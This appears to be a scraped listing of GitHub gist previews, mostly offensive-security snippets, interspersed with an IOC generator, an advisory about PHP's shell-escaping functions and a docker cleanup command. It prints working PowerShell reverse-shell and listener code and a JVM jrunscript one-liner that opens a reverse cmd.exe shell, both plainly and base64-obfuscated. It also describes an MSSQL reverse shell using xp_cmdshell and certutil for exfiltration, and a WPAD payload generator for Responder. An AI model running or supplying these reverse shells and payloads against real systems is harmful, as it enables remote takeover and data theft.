
I may be slow to respond.


MSAdministrator /
Last active May 7, 2021
Iranian APT Groups & Possible Commands Used By These Groups


The following content is generated using a preview release of Swimlane's pyattck.

This snippet of data is scoped to the following actor groups:

  • APT33
  • APT34
  • APT39
  • Charming Kitten
xassiz /
Created Mar 16, 2018
Reverse MSSQL shell
import sys
import requests
import threading
import HTMLParser
from BaseHTTPServer import HTTPServer, BaseHTTPRequestHandler
Description: Reverse MSSQL shell through xp_cmdshell + certutil for exfiltration
Author: @xassiz
jthuraisamy /
Last active Sep 25, 2019
CVE-2017-11907 WPAD.dat Generator for Responder


This script generates a payload for use with Responder.

  1. Generate a payload with
  2. Copy and paste the one-liner output into the WPADScript field of Responder.conf.
test@test:~$ python3 --help
usage: [-h] [-o OUT] cmd
staaldraad / receivefile.ps1
Created Feb 24, 2017
Small powershell script to bind to port, accept connection and stream to file. useful for ```cat blah.exe | nc 8080```
$socket = new-object System.Net.Sockets.TcpListener('', 1080);
if($socket -eq $null){
exit 1;
$client = $socket.AcceptTcpClient();
$stream = $client.GetStream();
$buffer = new-object System.Byte[] 2048;
$file = 'c:/afile.exe';
$fileStream = New-Object System.IO.FileStream($file, [System.IO.FileMode]'Create', [System.IO.FileAccess]'Write');
msuiche / ioc-generator.ps1
Created Jan 13, 2017
PowerShell IOCs generator
dir . | Foreach-Object{
$file = $_
$hash = Get-FileHash $file -Algorithm MD5
$fileinfo = Get-Item $file
New-Object -TypeName PSObject -Property @{
VersionInfo = $fileinfo.VersionInfo
LastWriteTime = $fileinfo.LastWriteTime
Length = $fileinfo.Length
Algorithm = $hash.Algorithm
Zenexer /
Last active Mar 15, 2021
Security Advisory: PHP's escapeshellcmd and escapeshellarg are insecure

Paul Buonopane at NamePros

I'm working on cleaning up this advisory so that it's more informative at a glance. Suggestions are welcome.

This advisory addresses the underlying PHP vulnerabilities behind Dawid Golunski's CVE-2016-10033, CVE-2016-10045, and CVE-2016-10074. It assumes prior understanding of these vulnerabilities.

This advisory does not yet have associated CVE identifiers.


staaldraad / mini-reverse.ps1
Created Oct 3, 2016
A reverse shell in Powershell
$socket = new-object System.Net.Sockets.TcpClient('', 413);
if($socket -eq $null){exit 1}
$stream = $socket.GetStream();
$writer = new-object System.IO.StreamWriter($stream);
$buffer = new-object System.Byte[] 1024;
$encoding = new-object System.Text.AsciiEncoding;
$read = $null;
staaldraad / mini-reverse-listener.ps1
Created Oct 3, 2016
A reverse shell listener in powershell
$socket = new-object System.Net.Sockets.TcpListener('', 413);
if($socket -eq $null){
exit 1
$client = $socket.AcceptTcpClient()
write-output "[*] Connection!"
frohoff /
Last active Aug 14, 2020
JVM Post-Exploitation One-Liners

Nashorn / Rhino:

  • Reverse Shell
$ jrunscript -e 'var host="localhost"; var port=8044; var cmd="cmd.exe"; var p=new java.lang.ProcessBuilder(cmd).redirectErrorStream(true).start();var s=new,port);var pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();var po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(;while(pe.available()>0)so.write(;while(si.available()>0)po.write(;so.flush();po.flush();java.lang.Thread.sleep(50);try {p.exitValue();break;}catch (e){}};p.destroy();s.close();'
  • Reverse Shell (Base-64 encoded)
$ jrunscript -e 'eval(new java.lang.String(javax.xml.bind.DatatypeConverter.parseBase64Binary("dmFyIGhvc3Q9ImxvY2FsaG9zdCI7IHZhciBwb3J0PTgwNDQ7IHZhciBjbWQ9ImNtZC5leGUiOyB2YXIgcD1uZXcgamF2YS5sYW5nLlByb2Nlc3NCdWlsZGVyKGNtZCkucmVkaXJlY3RFcnJvclN0cmVhbSh0cnVlKS5zdGFydCgpO3ZhciBzPW5ldyBqYXZhLm5ldC5Tb2NrZXQoaG9zdCxwb3J0KTt2YXIgcGk9cC5nZXRJbnB1dFN0cmVhbSgpLHBlPXAuZ2V
evanscottgray /
Last active May 9, 2021
kill all docker containers at once...
docker ps | awk {' print $1 '} | tail -n+2 > tmp.txt; for line in $(cat tmp.txt); do docker kill $line; done; rm tmp.txt